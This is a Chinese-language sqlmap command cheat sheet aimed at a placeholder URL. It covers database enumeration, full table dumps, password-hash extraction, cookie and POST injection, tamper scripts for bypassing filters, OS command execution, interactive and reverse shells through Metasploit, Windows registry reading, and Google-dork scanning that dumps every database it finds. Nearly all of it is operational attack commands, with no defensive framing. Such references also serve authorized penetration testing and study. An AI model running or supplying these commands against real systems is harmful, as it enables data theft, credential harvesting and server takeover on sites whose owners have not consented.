SQLMAP检索

基本步骤

sqlmap -u “http://url/news?id=1“ –current-user 获取当前用户名称
sqlmap -u “http://url/news?id=1“ –current-db 获取当前数据库名称
sqlmap -u “http://url/news?id=1“ –tables -D “db_name” 列表名
sqlmap -u “http://url/news?id=1“ –columns -T “tablename” -D “db_name” -v 0       列字段
sqlmap -u “http://url/news?id=1“ –dump -C “column_name” -T “table_name” -D “db_name” -v 0 获取字段内容

信息获取

sqlmap -u “http://url/news?id=1“ –smart –level 3 –users smart(智能),level(执行测试等级)
sqlmap -u “http://url/news?id=1“ –dbms “mysql” –users users列数据库用户,dbs列数据库
sqlmap -u “http://url/news?id=1“ –passwords 数据库用户密码
sqlmap -u “http://url/news?id=1“ –passwords -U root -v 0 列指定用户数据库密码
sqlmap -u “http://url/news?id=1“ –dumps -C “column_name” -T “table_name” -D “db_name” –start 1 –stop 20     列出指定字段
sqlmap -u “http://url/news?id=1“ –dump-all -v 0 列出所有数据库所有表
sqlmap -u “http://url/news?id=1“ –privileges -U root 查看指定用户权限
sqlmap -u “http://url/news?id=1“ –is-dba -v 1 是否是数据库管理员
sqlmap -u “http://url/news?id=1“ –roles 枚举数据库用户角色
sqlmap -u “http://url/news?id=1“ –udf-inject 导入用户自定义函数(获取系统权限!)
sqlmap -u “http://url/news?id=1“ –dump-all –exclude-sysdbs -v 0 列出当前库所有表
sqlmap -u “http://url/news?id=1“ –union-cols union查询表记录
sqlmap -u “http://url/news?id=1“ –cookie “COOKIE_VALUE” cookie注入
sqlmap -u “http://url/news?id=1“ –data “id=3” post注入
sqlmap -u “http://url/news?id=1“ -v 1 -f 指纹判别数据库类型
sqlmap -u “http://url/news?id=1“ –proxy “http://127.0.0.1:8118“ 代理注入
sqlmap -u “http://url/news?id=1“ –string “STRING_ON_TRUE_PAGE” 指定关键词
sqlmap -u “http://url/news?id=1“ –sql-shell 执行指定sql命令
sqlmap -u “http://url/news?id=1“ –os-cmd=whoami 执行系统命令
sqlmap -u “http://url/news?id=1“ –os-shell 系统交换shell
sqlmap -u “http://url/news?id=1“ –os-pwn 反弹shell
sqlmap -u “http://url/news?id=1“ –reg-read 读取windows系统注册表
sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” 保存进度
sqlmap -u “http://url/news?id=1“ –dbs-o “sqlmap.log” –resume 恢复已保存进度
sqlmap -u “http://url/news?id=1“ –msf-path=/…/msf2 –os-pwn 反弹shell需要metasploit路径
sqlmap -u “http://url/news?id=1“ –tamper “base64encode.py” 加载脚本(可利用绕过注入限制)
sqlmap -g “google语法” –dump-all –batch google搜索注入点自动跑出所有字段